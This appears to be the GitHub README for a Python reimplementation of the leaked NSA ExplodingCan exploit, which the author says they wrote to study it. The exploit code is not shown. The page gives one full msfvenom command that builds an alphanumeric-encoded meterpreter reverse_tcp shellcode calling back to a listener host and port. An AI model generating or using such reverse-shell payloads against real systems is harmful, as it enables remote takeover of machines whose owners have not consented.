danigargu / explodingcan

An implementation of NSA's ExplodingCan exploit in Python
261 stars 61 forks source link

ExplodingCan

An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA.

exploit

Details

Why?

Months ago I needed to study this exploit, and finally I implemented it in python.

Shellcode

The shellcode must be in alphanumeric format due to the limitations of the bug. For example we can use msfvenom (metasploit) with the alpha_mixed encoder.

$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode

Links